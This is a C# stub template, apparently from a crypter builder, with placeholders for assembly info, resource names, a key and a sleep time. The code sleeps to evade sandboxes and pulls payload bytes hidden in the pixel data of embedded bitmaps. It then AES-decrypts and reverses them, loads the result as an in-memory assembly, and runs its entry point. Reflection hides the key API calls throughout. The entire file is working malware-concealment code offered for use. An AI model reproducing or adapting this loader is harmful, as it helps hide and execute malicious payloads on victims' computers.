using System;
using System.Drawing;
using System.Threading;
using System.Resources;
using System.Reflection;
using System.Windows.Forms;
using Microsoft.VisualBasic;
using System.Drawing.Imaging;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
using System.Runtime.CompilerServices;

%ASSEMBLYINFO%

namespace NS
{
	class Program
	{
		%METHODS%
		
		|private static object obj;|
		|private static Type ByteType
		{
			get { return Type.GetType("System.Byte[]"); }
		}|
		
		|private static Type IntType
		{
			get { return Type.GetType("System.Int32"); }
		}|
				
		|static void Main(string[] args)
		{
			DoSleep();
			ResourceManager res = GetResMan();
			byte[] data = new byte[0];
			for(int i = 0; i < %IMGNUM%; i++)
			{
				Bitmap bmp = (Bitmap)res.GetObject("%IMGNAME%" + IntToString(i));
				byte[] loc = BitmapToByte(bmp);
				ResizeArray(ref data, data.Length + loc.Length);
				CopyArray(ref data, loc);
			}
			
			byte[] key = (byte[])Interaction.CallByName(res, "GetObject", CallType.Method, "%KEYNAME%");
			data = DecryptData(data, key);
			ReverseArray(ref data);
			
			Assembly a = LoadAssembly(data);
			DoInvoke((Assembly)obj, args);
		}|
		
		|private static void ReverseArray(ref byte[] data)
		{
			byte[] original = (byte[])data.Clone();
			for(int i = 0; i < data.Length; i++)
				data[i] = original[original.Length - 1 - i];
		}|
		
		|private static void CopyArray(ref byte[] data, byte[] loc)
		{
			for(int i = data.Length - loc.Length; i < data.Length; i++)
				data[i] = loc[i - data.Length + loc.Length];
		}|

		|private static void DoSleep()
		{
			foreach(MethodInfo m in Type.GetType("System.Threading.Thread").GetMethods())
				if(Interaction.CallByName(m, "Name", CallType.Get).ToString() == "Sleep")
					if(m.GetParameters().Length == 1)
						if(GetPType(m).Equals(IntType))
							m.Invoke(null, new object[] { %SLEEPTIME% });
		}|
		
		|private static Assembly LoadAssembly(byte[] data)
		{
			foreach(MethodInfo m in Type.GetType("System.Reflection.Assembly").GetMethods())
				if(Interaction.CallByName(m, "Name", CallType.Get).ToString() == "Load")
					if(m.GetParameters().Length == 1)
						if(GetPType(m).Equals(ByteType))
						{
							obj = m.Invoke(null, new object[] { data });
							return (Assembly)m.Invoke(null, new object[] { data });
						}
			return null;
		}|
		
		|private static Type GetPType(MethodInfo m)
		{
			return (Type)Interaction.CallByName(GetPInfos(m)[0], "ParameterType", CallType.Get);
		}|
		
		|private static ParameterInfo[] GetPInfos(MethodInfo m)
		{
			return (ParameterInfo[])Interaction.CallByName(m, "GetParameters", CallType.Method);
		}|
		
		|private static string IntToString(int i)
		{
			return i.ToString();
		}|
		
		|public static void DoInvoke(Assembly a, string[] args)
		{
			GetEP(a).Invoke(null, new object[] { args });			
		}|
		
		|private static MethodInfo GetEP(Assembly a)
		{
			return a.EntryPoint;
		}|
		
		|private static Assembly GetAssembly()
		{
			Type t = Type.GetType("System.Type");
			PropertyInfo p = t.GetProperty("Assembly");
			return (Assembly)p.GetValue(typeof(Program), null);
		}|
		
		|private static ResourceManager GetResMan()
		{
			return new ResourceManager("%RESNAME%", GetAssembly());
		}|
		
		|private static void ResizeArray(ref byte[] data, int newsize)
		{
			byte[] old = (byte[])data.Clone();
			data = new byte[newsize];
			Array.Copy(old, 0, data, 0, old.Length);
		}|
		
        |private static byte[] DecryptData(byte[] data, byte[] key)
        {
            RijndaelManaged rm = new RijndaelManaged();
            rm.Key = key;
            return rm.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
        }|

		|private static IntPtr CalculatePointer(IntPtr ptr)
		{
			return (IntPtr)((int)ptr + 4);
		}|

		|private static int GetDataSize(byte[] data)
		{
			int ret = 0;
			for(int i = 0; i < 4; i++)
				ret += data[i] * (int)Math.Pow(256, i);
			return ret;
		}|

        |private static byte[] BitmapToByte(Bitmap bmp)
        {
            BitmapData bdata = bmp.LockBits(new Rectangle(0, 0, bmp.Width, bmp.Height), ImageLockMode.ReadOnly, bmp.PixelFormat);
            byte[] ret = new byte[4];
            Marshal.Copy(bdata.Scan0, ret, 0, 4);
            ret = new byte[GetDataSize(ret)];
            Marshal.Copy(CalculatePointer(bdata.Scan0), ret, 0, ret.Length);
            return ret;
        }|
	}
}